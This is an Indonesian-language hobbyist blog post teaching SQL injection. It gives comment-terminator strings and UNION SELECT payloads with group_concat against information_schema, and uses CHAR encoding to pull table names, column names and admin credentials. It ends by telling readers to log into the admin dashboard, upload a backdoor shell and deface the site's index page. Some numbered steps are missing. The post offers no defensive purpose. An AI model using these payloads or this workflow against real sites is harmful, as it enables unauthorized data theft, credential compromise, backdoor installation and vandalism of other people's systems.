-->
Seccodeid_Blog
Seccodeid_Blog Just students

Sqli Attack

Apa itu sql injection dan cara mengeklpoitasinya



Hallo perkenalkan SkySec.saya berasal dari indonesia jawa tengah,pada post pertama kali ini saya akan membuat tutorial apa itu sqli dan cara exploitasinya.

A.Pengertian sqli

Di kutip dari wikipedia adalah sebuah teknik yang menyalahgunakan yang terjadi dalam lapisan basis data sebuah aplikasi.
SQL dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.

B.Penyebab terjadinya sqli 



sqli terjadi karena tidak ada filterasi syntax atau karaketer.contoh karakter (') dan (-).sehinnga attacker bisa mengeklpoitasinya dengan mudah.contoh string untuk mengexploitasi sqli : 




1.--+
2.+--+
3.)--
4.)--+
5.+--+
6.))--+

C.Cara mengeklpoitasi sqli 










.kemudian sobat ganti angka togelnya/columnny(3).di ganti dengan 
group_concat(table_name),angka lanjutanya.
Union+select+1,2,group_concat(table_name),4,5--

5.selanjutnya ketik 
From+information_schema.tables+where+table_schema=database()—
Setelah di angka.
Contoh : union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=databse()—
Tekan enter
Nanti akan muncul columnya.

6..setelah muncul columnya ganti (table_name) menjadi (column_name) dan +from+information_schema.tables.kata .tables di ganti dengan .columns
kata database di ganti dengan CHAR

7.kemudian sobat buka www.easycalculation.com/ASCII binary converter 
Masukan column yang ingin di converter.tunggu nanti akan keluar angka angka.jika sudah keluar sobat tinggal copy saja lalu masukan angka tadi di bagian CHAR(angka converter)—
NB : BERIKAN TANDA KOMA (,)SETELAH SPASI.CONTOH 89, 15, 110
Contoh : union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_schema=CHAR(89, 15, 110)—
Tekan enter 
Nah jika sobat sudah menemukan user dan passwordnya silahkan sobat bisa cari admin loginya.jika belum sobat harus sabar mencarinya hehehee.

8.Setelah masuk ke dashboard admin.sobat bisa upload shell backdoor kemudian tebas index dengan script deface sobat hehehe.

Sekian dan terima kasih,mohon maaf apabila ada kesalahan kata atau kurang jelas dalam penyampainya,jangan lupa follow blog ini dan support selalu.



Seccodeid_Blog
Seccodeid_Blog  Just students

Komentar